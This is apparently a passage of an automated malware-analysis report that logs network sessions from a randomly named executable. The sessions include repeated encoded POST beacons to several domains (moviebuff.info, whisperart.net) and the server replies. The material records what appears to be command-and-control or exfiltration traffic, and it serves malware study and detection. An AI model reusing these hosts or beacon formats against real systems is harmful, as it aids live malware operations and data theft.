                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:11:59.209815025 CET1160INHTTP/1.1 301 Moved Permanently
                                                                Connection: close
                                                                content-type: text/html
                                                                content-length: 795
                                                                date: Sat, 11 Jan 2025 04:11:59 GMT
                                                                server: LiteSpeed
                                                                location: https://www.cssa.auction/rjvg/?-Jkp4f=tUIUitDW424aYZRkIy55Xux7Uvf+CrCOh50QiitLwMhiL+1Z2tzWQWdXN3cz0curJDRK3/q9o39SyPNuZ2Q6LhCYnHJ/8h69BUffqagUGfmBx7ZXwKHkm00gzzb3+tPgf2IZ1KdDH/EL&SVjx=u6ApldVh4TiTWl
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                29192.168.2.750005209.74.77.10980360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:04.260195971 CET711OUTPOST /4r26/ HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.moviebuff.info
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.moviebuff.info/4r26/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 55 35 41 72 59 2f 47 53 42 34 73 75 54 41 66 66 2b 44 64 67 41 79 59 38 61 44 4a 59 42 64 75 57 74 30 53 73 5a 69 6f 62 61 4f 46 69 42 61 35 74 66 72 4b 41 42 32 6d 30 34 46 72 61 39 4e 71 63 71 6a 43 55 32 4a 6c 70 53 61 45 6b 45 51 57 57 56 42 44 61 41 2f 4a 42 6c 30 50 6c 36 49 53 39 56 75 74 66 68 42 55 71 48 43 4a 32 77 57 4e 2b 4c 4a 72 72 67 4f 31 65 6f 36 6a 6c 50 54 74 2b 42 70 55 31 59 33 66 63 33 32 50 79 52 36 62 65 51 6f 4d 32 36 47 59 45 61 4b 72 71 5a 43 59 70 70 4e 52 41 4c 74 58 63 63 6f 69 6b 58 69 5a 37 4c 4a 55 78 54 73 44 47 70 67 77 6b 77 36 63 46 56 42 6b 47 4f 41 3d 3d
                                                                Data Ascii: -Jkp4f=3PGUoE7TzLvmU5ArY/GSB4suTAff+DdgAyY8aDJYBduWt0SsZiobaOFiBa5tfrKAB2m04Fra9NqcqjCU2JlpSaEkEQWWVBDaA/JBl0Pl6IS9VutfhBUqHCJ2wWN+LJrrgO1eo6jlPTt+BpU1Y3fc32PyR6beQoM26GYEaKrqZCYppNRALtXccoikXiZ7LJUxTsDGpgwkw6cFVBkGOA==
                                                                Jan 11, 2025 05:12:04.843435049 CET533INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:04 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                30192.168.2.750006209.74.77.10980360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:06.801193953 CET731OUTPOST /4r26/ HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.moviebuff.info
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.moviebuff.info/4r26/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 57 59 77 72 4c 6f 53 53 56 6f 73 76 50 77 66 66 78 6a 64 6b 41 79 55 38 61 42 6b 48 64 2f 36 57 74 55 43 73 59 6e 45 62 64 4f 46 69 4b 36 35 6b 62 72 4b 31 42 32 69 6a 34 45 58 61 39 4e 75 63 71 6d 2b 55 33 2b 35 6f 49 71 45 6d 4e 77 57 59 49 78 44 61 41 2f 4a 42 6c 30 79 4b 36 49 71 39 56 65 39 66 7a 31 67 74 4b 69 4a 31 34 32 4e 2b 63 35 72 76 67 4f 31 38 6f 37 4f 77 50 52 6c 2b 42 72 4d 31 5a 6c 6e 64 2b 32 50 38 4d 71 62 4c 63 4b 68 69 34 45 73 70 66 59 7a 38 66 31 73 71 6f 37 51 69 52 50 62 77 43 35 61 66 54 67 39 4e 63 76 4a 45 52 74 48 65 6b 43 45 46 76 4e 35 76 59 54 46 43 59 77 6d 76 4d 61 59 62 6a 41 72 50 67 4d 44 5a 58 39 75 65 59 36 63 3d
                                                                Data Ascii: -Jkp4f=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/6WtUCsYnEbdOFiK65kbrK1B2ij4EXa9Nucqm+U3+5oIqEmNwWYIxDaA/JBl0yK6Iq9Ve9fz1gtKiJ142N+c5rvgO18o7OwPRl+BrM1Zlnd+2P8MqbLcKhi4EspfYz8f1sqo7QiRPbwC5afTg9NcvJERtHekCEFvN5vYTFCYwmvMaYbjArPgMDZX9ueY6c=
                                                                Jan 11, 2025 05:12:07.376384974 CET533INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:07 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                31192.168.2.750007209.74.77.10980360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:09.540302038 CET1744OUTPOST /4r26/ HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.moviebuff.info
                                                                Content-Length: 1251
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.moviebuff.info/4r26/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 33 50 47 55 6f 45 37 54 7a 4c 76 6d 57 59 77 72 4c 6f 53 53 56 6f 73 76 50 77 66 66 78 6a 64 6b 41 79 55 38 61 42 6b 48 64 2f 69 57 74 6e 61 73 5a 45 38 62 63 4f 46 69 44 61 35 68 62 72 4b 73 42 79 50 4c 34 45 62 67 39 50 47 63 71 41 4b 55 2f 71 4e 6f 64 36 45 6d 41 51 57 5a 56 42 44 50 41 2f 5a 46 6c 30 43 4b 36 49 71 39 56 64 56 66 78 68 55 74 49 69 4a 32 77 57 4e 36 4c 4a 72 54 67 4f 74 47 6f 37 4c 4c 50 67 46 2b 43 4c 63 31 65 51 7a 64 2f 57 50 70 50 71 61 4f 63 4b 74 55 34 45 77 74 66 5a 58 53 66 79 41 71 71 4f 39 71 57 73 72 4c 55 66 32 58 59 52 64 4f 57 38 74 32 54 65 54 57 72 53 45 58 69 4d 42 4e 64 41 56 2b 55 41 37 53 51 4c 4a 6c 69 7a 7a 64 67 49 32 37 4e 76 4c 61 47 66 2b 2b 47 37 6a 30 57 75 51 67 33 42 55 34 35 48 2b 74 30 43 43 75 30 5a 4e 77 61 33 6d 6e 56 41 78 32 4f 49 4f 34 7a 56 64 34 48 65 47 32 64 43 6c 5a 6b 75 35 6d 76 62 77 71 59 67 48 6c 5a 42 42 67 4c 4e 47 6f 58 59 45 6e 57 35 2b 5a 67 62 59 49 49 70 57 62 46 32 70 32 51 75 63 66 76 36 4b 59 35 43 76 [TRUNCATED]
                                                                Data Ascii: -Jkp4f=3PGUoE7TzLvmWYwrLoSSVosvPwffxjdkAyU8aBkHd/iWtnasZE8bcOFiDa5hbrKsByPL4Ebg9PGcqAKU/qNod6EmAQWZVBDPA/ZFl0CK6Iq9VdVfxhUtIiJ2wWN6LJrTgOtGo7LLPgF+CLc1eQzd/WPpPqaOcKtU4EwtfZXSfyAqqO9qWsrLUf2XYRdOW8t2TeTWrSEXiMBNdAV+UA7SQLJlizzdgI27NvLaGf++G7j0WuQg3BU45H+t0CCu0ZNwa3mnVAx2OIO4zVd4HeG2dClZku5mvbwqYgHlZBBgLNGoXYEnW5+ZgbYIIpWbF2p2Qucfv6KY5CvSH/4sEJwnz8NLfs1bkjzAA3/6zNOVSJx/zNU8wb4Cgcvl65hifR+ZCw0ROIMwvIHxW1Zslq6fcdcMwB0ZWO8HmCLTJ42sdW4jZZ2EU7ShI+5pssGAY2Sfeq+rbRgaAHPJVkJsYzNMaPrtMVSrQKZEKvWYEnvGX8sI4KflCw9v3/gFecAYd/i+RwehzyvzSINKaAfzSMyVuFwh+UeHbHMuh+GazAD/RnCkHqo2lzyiOxKc5KljLr9woBQ0M+rSiv8c70U41NyEHciEVY5xLtRJ42NkHjrlovS9QgZzwFLN1Z+ZLlWysEgpXCYKiQ2iEh+qt3gcpKrIeEGjpLKSHXQC4wjmBrRwA6fQlX7spRGmhKYEqkSLkfXYipYDTZdH1i6LBmJr9OME587Jl/vBsdFXiKydHc+DkHWod9Bo52rtxxxvWj/vIe8UeSGqLjDHnKrRIgR8S+93OOdOCMEaMttI+MyR1gyRUJrQ43fq/1NTaZx92jBU0a8Ck6b8WjbEeLvisCFpbYf00wHa6glSb43zqtdmJ4I71kOg0yJ6rS+ODjmZ8t0NrqzuIaVsK5EbxFagLw0hNbOSAd7Slgu19iDf80ySVf8+OtB3nO6zfUYEuDYzc1gU+n77bN+m/yk9p6L4tohdK49ztpQbYLwiXdvDyA+Kfk3oVqn7m [TRUNCATED]
                                                                Jan 11, 2025 05:12:10.244792938 CET533INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:10 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                32192.168.2.750008209.74.77.10980360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:12.077794075 CET451OUTGET /4r26/?SVjx=u6ApldVh4TiTWl&-Jkp4f=6Nu0rwDBxqyxMqkAEP2GSfhicAip3HxzZXQ7XTYJGNWQuHKPGXYdStA7Or1ZV5iEeiylzT/9sq3lky3p7a80ZqplMgmPVg/XIvRa/yHQo/zEfdJf4ghlIiV10Ap+CPKwkexekqfqMwY1 HTTP/1.1
                                                                Host: www.moviebuff.info
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Language: en-US,en;q=0.9
                                                                Connection: close
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Jan 11, 2025 05:12:12.676372051 CET548INHTTP/1.1 404 Not Found
                                                                Date: Sat, 11 Jan 2025 04:12:12 GMT
                                                                Server: Apache
                                                                Content-Length: 389
                                                                Connection: close
                                                                Content-Type: text/html; charset=utf-8
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                33192.168.2.750009199.59.243.22880360C:\Program Files (x86)\NEaqCOWJTvZbfHJJfSwkziITrFaLzVpvIPeYroQvjyXcbZfxKeKxHNa\EbjRcLZjak.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:17.783098936 CET711OUTPOST /rfcw/ HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.whisperart.net
                                                                Content-Length: 219
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.whisperart.net/rfcw/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                Data Raw: 2d 4a 6b 70 34 66 3d 34 42 39 51 6e 2f 49 77 2f 44 6a 49 62 4d 31 53 49 77 53 35 47 4d 76 53 71 41 4e 54 6c 68 39 4f 56 31 6f 7a 32 7a 7a 50 5a 31 62 56 70 62 32 43 52 42 76 2b 76 35 5a 30 73 66 2b 54 75 67 4e 39 36 5a 64 4b 46 53 4d 49 45 6d 31 46 74 50 44 52 78 75 2f 56 77 4c 64 30 45 30 30 42 64 39 4a 76 6f 34 54 4f 2f 73 5a 48 2b 54 6e 4f 47 36 64 68 58 58 38 51 4b 56 39 74 2b 4b 6b 34 78 61 6f 75 2f 37 35 32 2b 70 35 61 37 45 71 6d 37 74 75 7a 47 78 4a 7a 2b 74 7a 31 64 52 68 66 4c 58 6f 68 73 36 63 67 66 62 65 55 58 64 57 50 4c 6e 45 49 52 62 77 57 33 37 49 2b 36 48 74 64 50 59 70 36 41 64 47 52 39 44 50 6f 5a 4e 59 57 79 61 72 67 34 77 3d 3d
                                                                Data Ascii: -Jkp4f=4B9Qn/Iw/DjIbM1SIwS5GMvSqANTlh9OV1oz2zzPZ1bVpb2CRBv+v5Z0sf+TugN96ZdKFSMIEm1FtPDRxu/VwLd0E00Bd9Jvo4TO/sZH+TnOG6dhXX8QKV9t+Kk4xaou/752+p5a7Eqm7tuzGxJz+tz1dRhfLXohs6cgfbeUXdWPLnEIRbwW37I+6HtdPYp6AdGR9DPoZNYWyarg4w==
                                                                Jan 11, 2025 05:12:18.242116928 CET1236INHTTP/1.1 200 OK
                                                                date: Sat, 11 Jan 2025 04:12:17 GMT
                                                                content-type: text/html; charset=utf-8
                                                                content-length: 1122
                                                                x-request-id: bd24774d-bb6c-441b-ac91-50e62fbda6de
                                                                cache-control: no-store, max-age=0
                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                vary: sec-ch-prefers-color-scheme
                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==
                                                                set-cookie: parking_session=bd24774d-bb6c-441b-ac91-50e62fbda6de; expires=Sat, 11 Jan 2025 04:27:18 GMT; path=/
                                                                connection: close
                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 71 53 4c 4e 7a 4a 5a 56 4f 48 34 57 46 63 54 2f 5a 77 54 4c 50 33 54 6c 48 47 34 4e 53 69 72 70 44 37 57 4c 71 78 55 7a 33 5a 4b 36 4e 72 6b 31 72 75 35 4d 68 2b 70 73 33 72 68 54 36 53 50 78 63 73 43 4f 4d 54 36 4e 46 6b 48 35 64 31 4d 4c 4f 5a 7a 33 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_kqSLNzJZVOH4WFcT/ZwTLP3TlHG4NSirpD7WLqxUz3ZK6Nrk1ru5Mh+ps3rhT6SPxcsCOMT6NFkH5d1MLOZz3g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                Jan 11, 2025 05:12:18.242187023 CET575INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmQyNDc3NGQtYmI2Yy00NDFiLWFjOTEtNTBlNjJmYmRhNmRlIiwicGFnZV90aW1lIjoxNzM2NTY4Nz


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                34192.168.2.750010199.59.243.22880
                                                                TimestampBytes transferredDirectionData
                                                                Jan 11, 2025 05:12:20.332845926 CET731OUTPOST /rfcw/ HTTP/1.1
                                                                Host: www.whisperart.net
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                Origin: http://www.whisperart.net
                                                                Content-Length: 239
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Cache-Control: no-cache
                                                                Connection: close
                                                                Referer: http://www.whisperart.net/rfcw/
                                                                User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
